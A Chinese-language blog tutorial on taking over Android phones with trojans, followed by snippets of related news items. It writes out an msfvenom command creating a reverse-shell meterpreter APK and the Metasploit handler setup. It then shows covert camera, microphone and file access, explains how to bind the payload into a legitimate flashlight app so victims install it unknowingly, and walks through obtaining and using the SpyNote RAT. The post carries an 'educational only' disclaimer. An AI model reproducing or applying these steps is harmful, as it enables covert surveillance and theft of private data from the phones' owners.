【黑客教程】利用木馬遠程控制目標手機

2021-02-14 手機電腦雙黑客
        世界那麼大,謝謝你來看我!!關注我你就是個網絡、電腦、手機小達人來源:https://mp.weixin.qq.com/s/ijU7Z-eSBwENOwH3tMhRFQ1.實驗涉及復現環境 
Kali平臺(Hack):192.168.0.101

Android模擬器(靶機1):192.168.0.106

Android魅族note2手機(靶機2):192.168.0.104

Java環境,.net環境構建 。(spyNote軟體需要環境)

2.環境配置二Android模擬器

2.1首先從官網上下載雷電模擬器

2.2下載完後。

點擊.exe文件直接運行安裝,運行,下一步,直接完成安裝。

 

2.3 安裝完成後在電腦桌面顯示下面logo

2.4 對模擬器網絡進行配置在右邊的設置裡面選擇設置>網絡設置>網絡橋接模式開啟,ip設置dhcp,最下面點擊安裝:

 

2.5 安裝成功後顯示安裝成功:

 

3.生成後門

3.1打開虛擬機,啟動kali,打開終端,生成apk後門。

lhost為windows的ip(可以根據自己的IP設定),lport指定一個埠5001。

打開終端輸入命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=5001 R > /etc/222.apk

(生成apk文件)

3.2生成文件後我們到/etc/222.apk目錄下,

拷貝我們的apk文件,

到我們的windows平臺下,然後啟動我們的雷電模擬器,點擊啟動:

 

(啟動界面)

3.3在右下角有個apk,點擊選擇文件安裝。

 

3.4然後為了測試我們使用模擬器安裝apk文件:

(成功安裝木馬文件)

4 使用metasploit控制臺對模擬器進行攻擊:

4.1 啟動metasploit:

 

(啟動界面)

4.2 使用模塊:use exploit/multi/handler

 

(設置exploit)

4.3 設置模塊set payload android/meterpreter/reverse_tcp

(paload設置)

4.4 設置攻擊機和埠號和啟動:

(參數配置)

4.5 顯示正在監聽靶機:

 

(監聽中)

4.6 回到我們的模擬器靶機,我們點擊運行我們安裝的文件

 

(雙擊運行)

4.7 看到成功返回shell

 

(返回shell)

4.8 查看模擬手機的版本信息:sysinfo

(手機作業系統信息)

4.9 返回我們的模擬器,啟動虛擬終端,查看攻擊機和靶機的建立的聯繫:

 (靶機被控的聯繫)

5 啟用真機測試

5.1 步驟如以上環境,我在自己的手機上安裝這個apk文件:

(note2手機安裝)

5.2 按照上面獲取shell的方法成功連接真機.:

 (連接真機成功)

5.3 手機攻擊演示:獲取版本信息:

 (手機版本信息)

5.4查看網絡信息:(ifconfig)

(手機網絡狀態)

5.5查看root狀態:

 (顯示手機未root)

5.6 啟用網頁視屏聊天:

 (手機未找到合適的瀏覽器打開)

5.7查看手機有幾個攝像頭

 (顯示有2個)

5.8進行調用攝像頭偷拍(默認前置攝像頭):

 

5.9網頁攝像機視屏流,顯示實時畫面能夠調用攝像頭,實時觀看被攻擊者的像機對著的物體,以下為通過此辦法獲取到的一段圖片資料:

5.10 進行錄音操作:

 (成功錄音並保存)

5.11 獲得shell後有很多的攻擊方法,我就不一一操作,將其匯總如下:

(網絡和系統信息獲取)

 (系統命令執行和攝像頭操作)

6 遠控升級之捆綁app:

說明:現實生活中沒有人會傻乎乎的下載個木馬apk文件呀,所以我們的通過一些偽裝的辦法,將apk木馬文件捆綁在用戶常用的App上,誘導用戶下載使用。

步驟如下:

先捋一下思路,把PAYLOAD小馬注入到一個目標apk文件中,關鍵是要找到目標APK的入口,並把啟動payload小馬的代碼添加進去,隨目標APK一起啟動,從而實現監聽手機的目的。當然前提是apk文件可逆。

這裡使用注入目標apk文件:手電筒—-魅族市場下載的(名為shoudiantong.apk)。我們使用上文攻擊魅族手機用到的222.apk文件。

6.1 反編譯payload小馬222.apk和shoudiantong.apk

(說明:反編譯軟體kali系統中自帶,以下操作在windows,所以需要下載一個apktool。

命令:

apktool d houmen.apk

apktool d shoudiantong.apk

(反編譯生成兩個新文件)

6.2 開始尋找手電筒shoudiantong.apk文件的入口,

在手電筒shoudiantong的Manifest.xml文件中查找Main和Launch關鍵詞,定位到所對應的啟動smail文件

 

6.3 直接搜索onCreat函數,找到bundle對象,你並在下面添加啟動paload添加如下代碼:(改動文件:MainActivety.smail)

 

6.4 點擊保存之後呢,我們還要把剛才反編譯的payload文件中的smail代碼複製過來,把payload的smail/com/metasploit文件複製到手電筒的smail/com/目錄下。

6.5 回編譯:apktool b shoudiantong.apk

 

6.6 籤名,這一部需要完成,發現沒有籤名的apk文件安裝時會解析錯誤

生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

因為我在本機沒有這個工具,所以在kali系統完成:

6.7 給shoudiantong.apk籤名:

 

6.8 Shoudiantong.apk木馬文件測試,將手電筒apk文件裝在手機上:

 

6.9 打開並正常使用完全沒問題:

 

7 進行手機攻擊

7.1 查看手機與攻擊機建立的聯繫

 

7.2 試著操作一些上述沒有操作過的命令試試:

 

7.3 查看路由信息:

 

7.4 ps查看進程:

 


8 總結:

通過對手機木馬文件對手機的植入,我們可以成功的對手機進行控制,其中包括對手機使用者進行錄音、拍照、查看下載手機私密文件,獲取手機網絡信息,進程信息等。

實現對手機的完全控制。

本文簡單介紹如何將木馬文件綁定到正常app實現對受害者攻擊,其實還有很多辦法,如通過中間人、釣魚實現木馬植入等。

9 圖形界面控制軟體SpyNote的使用10 環境配置三java環境和.net環境:

11 spynote安裝使用

11.1百度搜索「spynote下載」找到相應的安裝包,或者訪問地址:

(http://www.rekings.com/spynote-v5-android-rat/)

進行下載下載後使用解壓密碼:rekings.com打開:

11.2 雙擊運行軟體出現以下界面填寫一個大於1023的埠,默認2222

 

(填寫埠)

11.3配置生成木馬apk文件,

我這裡配置埠:222我們的攻擊機為:192.168.0.100也就是我計算機的ip,然後應用的名字test,點擊上方的build就可以生成文件:

11.4演示過程涉及一些個人隱私,

所以在演示的過程中我們用上面實驗中用到的手機模擬器來代替打開我們的雷電模擬器,點擊右下角的apk安裝,把我們生成的apk文件安裝

(test.apk文件默認放在C:\Administrator\output):

(安裝apk文件)

12 攻擊演示:

12.1 回到spyNote軟體,我們發現有一臺機器成功上線:

12.2 在設備上右擊選擇 tools P依次有一些命令執行:

(攻擊方式)

12.3 我們選擇tools p>record calls得到手機的通話記錄

(通話記錄)

12.4 我們選擇tools p>record calls得到手機的通話記錄install aplications查看手機的安裝的應用軟體:

(安裝的軟體)

12.5 我們選擇tools p>file managerke可以查看手機裡面的文件,可以任意下載,拷貝,刪除等等。

 

(文件管理)

12.6 我們選擇tools p>romote commands可以進行遠程終端管理:

(遠程終端管理)

13 總結:

功能太多,不一一演示,其中還包括照相、監聽電話聲音、查看通訊錄、發送簡訊等等一些功能,等於自己手機咯都不用買手機

喜歡的小夥伴記得三連擊!!!

聲明:本人分享該教程是希望大家,通過這個教程了解信息安全並提高警惕!本教程僅限於教學使用,不得用於其他用途觸犯法律,本人一概不負責,請知悉!如有侵權請告知刪除。免責聲明:本文旨在傳遞更多市場信息,不構成任何投資建議和其他非法用途。文章僅代表作者觀點,不代表手機電腦雙黑客立場。以上文章之對於正確的用途,僅適用於學習。

相關焦點

  • 【教程】利用木馬遠程控制目標手機
    步驟如下:先捋一下思路,把PAYLOAD小馬注入到一個目標apk文件中,關鍵是要找到目標APK的入口,並把啟動payload小馬的代碼添加進去,隨目標APK一起啟動,從而實現監聽手機的目的。當然前提是apk文件可逆。這裡使用注入目標apk文件:手電筒—-魅族市場下載的(名為shoudiantong.apk)。
  • 反擊黑客遠程控制!
    但是,如果這些後門被其他人知道,或是在發布軟體之前沒有刪除後門程序,那麼它就成了安全風險,容易被黑客當成漏洞進行攻擊。通俗的講,後門程序就是留在計算機系統中,供某位特殊使用者通過某種特殊方式控制計算機系統的途徑。一、遠程控制的兩個通性(1)任何一款的遠程控制技術都必須與目標(被控端)建立至少一個TCP或者UPD連接。
  • 快捷方式變身 成木馬遠程攻擊按鈕
    上周五曝出的微軟「快捷方式自動執行」高危漏洞,讓黑客通過快捷方式,就能自動運行電腦硬碟和USB設備上指定的木馬。昨日,針對該漏洞的攻擊手段再度升級:通過快捷方式,黑客能讓網民電腦下載運行全球網絡伺服器上的任意木馬。      「也就是說,木馬利用微軟『快捷方式自動執行』高危漏洞的傳播途徑,已從U盤攻擊升級為遠程精確打擊,攔截難度也隨之大大提升。」
  • 新書推薦:最新黑客攻防從入門到精通
    >【內容簡介】本書共19章,結合案例,由淺入深、系統全面地介紹了黑客攻防技術,內容涵蓋:從零開始認識黑客、信息的掃描與嗅探、系統漏洞攻防、病毒攻防、木馬攻防、手機黑客攻防、網遊與網吧攻防、密碼攻防、黑客入侵檢測技術、網絡代理與追蹤技術、後門技術、入侵痕跡清除技術、遠程控制技術、區域網攻防、QQ帳號攻防、網站攻防、系統和數據的備份與恢復、保障網絡支付工具的安全、間諜軟體的清除和系統清理
  • 新買的手機裡竟有木馬病毒?這樣被控制的手機全國有30餘萬臺!
    金羊網訊 記者黃麗娜,通訊員周兵、林鴻升、李長達報導:新買的手機裡就被植入了木馬病毒,一旦插卡使用後,你的一切信息就是犯罪分子的了。19日,在廣東省公安廳召開的「淨網2019」專項行動發布會上,警方公布了這一駭人聽聞的新作案手法。
  • ...Tesla 遠程訪問木馬通過 COVID-19 相關垃圾郵件攻擊活動大肆傳播
    研究人員發現,多起 COVID-19 相關垃圾郵件攻擊活動正在傳播 Agent Tesla 遠程訪問木馬的新變種,使這一惡意軟體躍升至指數報告排行榜第三位,波及全球 3% 的組織。Agent Tesla 的新變種已經過修改,可從目標電腦竊取 Wi-Fi 密碼及其他信息,例如 Outlook 電子郵件證書。
  • 這些基本行業術語都不懂 還學人家做黑客?
    之所以將其放在第一個說,也是因為它是我們很早就接觸過的攻擊手法之一,專指那些將自己的外表偽裝成正常程序,善於偽裝自己,然而一旦這些程序運行時,就會獲取系統的整個控制權限,很多黑客都熱衷於使用木馬病毒來控制被攻擊者的電腦,例如之前的黑洞、灰鴿子、PCshare等等。網頁木馬。指那些外表上偽裝成普通的網頁文件,或是將木馬程序代碼直接插入到正常的網頁文件中。
  • 黑客可利用Apache Guacamole漏洞進行遠程桌面攻擊
    所報告的漏洞可使黑客完全控制Guacamole伺服器,攔截和控制所有其他連接的會話。根據Check Point Research發布的一份報告顯示,已經發現黑客成功破壞了組織內部計算機,攻擊者在工作人員嘗試連接並不知情的情況下連接到Guacamole網關時發起攻擊。
  • 利用AirDrop 底層協議漏洞,黑客可以控制你的 iPhone
    兩分鐘隔空攻破 iPhone最快只需兩分鐘,只需兩分鐘,黑客就可以利用蘋果 AWDL(AppleWirelessDirectLink)協議的漏洞侵入 iPhone。▲ 谷歌 ProjectZero 安全研究員 IanBeer 演示隔空控制 iPhone接下來,黑客可以完全訪問你的 iPhone,任意讀取郵件和其它重要信息,或者下載 iPhone 裡的照片,甚至還有可能通過 iPhone 的麥克風和攝像頭監視和監聽用戶。
  • 金立手機植入「木馬」非法獲利2700餘萬,你的手機中招了嗎?
    在2018年12月至2019年10月期間,該公司利用木馬幫助平臺或APP「拉活」28.84億多次,涉及金立牌手機2650多萬臺,獲利2700多萬元。 「拉活」是指通過植入木馬等手段,在用戶不知情的情況下為一些平臺或APP刷高活躍度,並從中謀取利益。該行為會直接導致用戶手機的電量和流量消耗加快、內存被佔用等問題,進而影響使用體驗。
  • 手機恢復出廠設置,可以解決黑客入侵嗎?
    通過恢復出廠設置,可以解決黑客入侵問題嗎?黑客都是如何入侵我們的手機的?哈嘍,大家好,我是張老師。今天回答一位粉絲朋友的評論:手機恢復出廠設置,可以解決被黑客入侵的問題嗎?首先,咱們先看一下,黑客通常都是如何入侵咱們手機的?黑客可以通過惡意軟體,通過Wi-Fi,惡意連結,達到入侵的目的。今天,咱們就重點看一下惡意軟體入侵這種方式,這種方式的破壞能力最強,用戶受到的影響最嚴重。這裡的惡意軟體,並不一定就是明面上寫著,我是惡意軟體,黑客怎麼會這麼傻呢?
  • Instagram出現巨大漏洞:黑客可利用該漏洞完全控制用戶手機
    玩懂手機網資訊,根據 Check Point Security 網絡安全人員研究人員剛剛發布的消息表示,Instagram 出現了一個巨大的漏洞,該漏洞可以讓黑客利用 Instagram 完全控制用戶用戶手機,而不簡單的只是洩露了 Instagram 的帳戶信息。
  • 手機中毒變「肉雞」 個人信息1元賤賣
    甚至還有黑客專門在QQ群中收費傳授「抓雞和攻擊手機的技術」,聲稱只需花300元錢,一臺電腦一根網線,普通用戶即可成為攻擊他人手機的黑客。  對此,京潤律師事務所律師韓驍表示,利用「手機肉雞」遠程控制他人手機,涉嫌「非法侵入計算機信息系統罪」、「非法獲取計算機信息系統數據、非法控制計算機信息系統罪」,情節特別嚴重的,最高可處七年以下有期徒刑,並處罰金。
  • 如何遠程控制另外一部手機,實現遠程釘釘打卡!
    1.可以在家裡控制公司裡一部手機實現遠程釘釘打卡2.家長可以控制孩子的手機實現遠程協助。3.可以遠程幫助父母使用不會用的手機功能。4.你可以遠程打開自己在家的攝像頭。先看效果在給大家講方法今天給大家推薦的這款軟體並不陌生就是AirDroid 實現真正的手機遠程控制手機,意思就是不限區域網,不只是共享屏幕,完全控制手機。而且這款軟體非常強大很多功能我就不細講了我們直接開始上教程吧!
  • 600萬部裝有木馬的手機流向老年人!警方雷霆行動擋獲25人
    不少老年人在挑選手機時常常會選用功能簡單、價格低廉的老年機。不過,有不法分子盯上了部分缺乏保護的老年機,植入病毒木馬,實現遠程控制,非法獲利。1月11日,紅星新聞記者從四川攀枝花市公安局東區分局獲悉,攀枝花東區警方日前成功破獲一起非法控制計算機信息系統案件,打掉了三個控制「老年」手機非法獲利的犯罪團夥,抓獲涉案人員25人,扣押安裝有木馬程序的手機2萬餘部。
  • 通過滲透測試服務來解決網站被黑客攻擊
    APP滲透測試目前包含了Android端+IOS端的漏洞檢測與安全測試,前段時間某金融客戶的APP被黑客惡意攻擊,導致APP裡的用戶數據包括平臺裡的帳號,密碼,手機號,姓名都被信息洩露,通過老客戶的介紹找到我們SINE安全公司尋求安全防護上的技術支持,防止後期APP被攻擊以及數據篡改洩露等安全問題的發生
  • iphone/安卓手機如何投屏電腦獲取捷徑?還可以遠程控制!
    #安卓蘋果軟體#今天小編就教大家一個如何獲得iPhone 12投屏電腦,遠程控制電腦的獲取讓擁有iPhone12的小夥伴,下載向日葵遠程控制APP,打開「手機投屏」功能。然後拿出自己的手機,安卓/iPhone都可以。打開向日葵遠程控制APP,輸入iPhone12設備上的識別碼+驗證碼。
  • 共享充電寶或被植入木馬病毒!某些品牌手機竟也暗中植入木馬
    共享充電寶或被植入木馬病毒!某些品牌手機竟也暗中植入木馬,2000多萬用戶成「肉雞」?警惕身邊的共享充電寶陷阱!警方表示,大家常使用的共享充電寶可能被植入木馬程序,一旦插入手機,可能就會盜取你的個人隱私信息,包括通訊錄、照片、視頻等等。
  • TeamViewer手機遠程控制電腦——高效達人必備神器
    日常工作中,有時我們外出不便,而又需要一臺電腦來處理問題,這時我們就可以通過手機遠程控制電腦來解決問題。TeamViewer作為全球領先的電腦遠程辦公軟體,專注於為用戶提供高效、安全、定製化的SaaS解決方案,搭建信息共享的實用工具平臺。
  • 一個木馬病毒,默默打開了你手機的「後門」
    11月30日公開的《深圳市致璞科技有限公司、徐黎、朱穎等非法獲取計算機信息系統數據、非法控制計算機信息系統罪一審刑事判決書》發現,據法院審理查明,2018年7、8月份,北京佰策科技有限公司法定代表人朱某與被告單位致璞科技負責人即被告人徐黎合謀,採用具有「拉活」功能的SDK控制用戶手機的方式合作開展「拉活」業務。